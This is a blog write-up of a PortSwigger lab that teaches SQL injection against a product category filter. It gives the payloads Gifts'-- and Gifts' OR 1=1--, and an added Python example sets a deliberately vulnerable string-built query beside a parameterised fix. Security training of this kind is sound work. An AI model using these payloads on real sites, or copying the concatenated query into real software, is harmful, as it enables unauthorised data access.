PortSwigger Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

br4ind3ad
2 min read, Dec 24, 2021

Retrieving hidden data

Lab Description: This lab contains an SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.

Steps:

1. Access the lab and explore the web application.

2. In Categories, click on Gifts.

3. In this category you can see that there are only 3 products.

The SQL query that retrieves these 3 products will be:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

The restriction released = 1 is being used to hide products that are not released. For unreleased products, presumably released = 0.

4. To bypass this, let's end the query early: close the string with a single quote and add a double dash (--), which comments out the rest of the query. The category value becomes Gifts'--

The query now becomes:

SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1

Only the part before the double dash, SELECT * FROM products WHERE category = 'Gifts', is executed; the AND released = 1 condition is now inside the comment.

Here, all products are displayed, including unreleased products in this category.

5. Going further, we can cause the application to display all the products in any category, including categories that we don't know about, by using Gifts' OR 1=1--

https://ac5d1f8c1f19b592c0f507aa005e00af.web-security-academy.net/filter?category=Gifts%27%20OR%201=1--

This results in the SQL query:

SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1

The modified query will return all items where either the category is Gifts or 1 is equal to 1. Since 1=1 is always true, and the released = 1 condition has again been commented out, the query returns every product in the table.
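As an added illustration (not part of the original post or the lab's own code), here is a small Python/SQLite model of the lab's category filter: the vulnerable string-built query next to a parameterised one, run over constructed sample data with the two payloads from the walkthrough. Table and product names are made up for the example.

```python
import sqlite3

# Constructed sample catalogue (not the lab's real data): three released
# Gifts, one unreleased Gift, and one unreleased product in another category.
PRODUCTS = [
    ("Gifts", "Mug", 1),
    ("Gifts", "Scarf", 1),
    ("Gifts", "Candle", 1),
    ("Gifts", "Unreleased gadget", 0),
    ("Toys", "Secret toy", 0),
]


def make_db():
    """Create an in-memory products table matching the lab's query shape."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (category TEXT, name TEXT, released INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn


def filter_vulnerable(conn, category):
    """Builds the WHERE clause by concatenation, the pattern the lab exploits.

    A value such as Gifts'-- closes the string literal and turns the
    remaining "AND released = 1" into an SQL comment.
    """
    sql = ("SELECT name FROM products WHERE category = '"
           + category + "' AND released = 1 ORDER BY rowid")
    return [row[0] for row in conn.execute(sql)]


def filter_safe(conn, category):
    """Parameterised version: the category is bound as data, never parsed as SQL.

    Quotes and "--" inside the value simply become part of the compared string.
    """
    sql = ("SELECT name FROM products WHERE category = ? AND released = 1 "
           "ORDER BY rowid")
    return [row[0] for row in conn.execute(sql, (category,))]


if __name__ == "__main__":
    db = make_db()
    for payload in ("Gifts", "Gifts'--", "Gifts' OR 1=1--"):
        print(repr(payload), "vulnerable:", filter_vulnerable(db, payload))
        print(repr(payload), "safe:      ", filter_safe(db, payload))
```

Running it shows the vulnerable filter returning the unreleased Gift for the first payload and every row for the second, while the parameterised filter returns nothing for either injected value.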

Thanks for Reading!
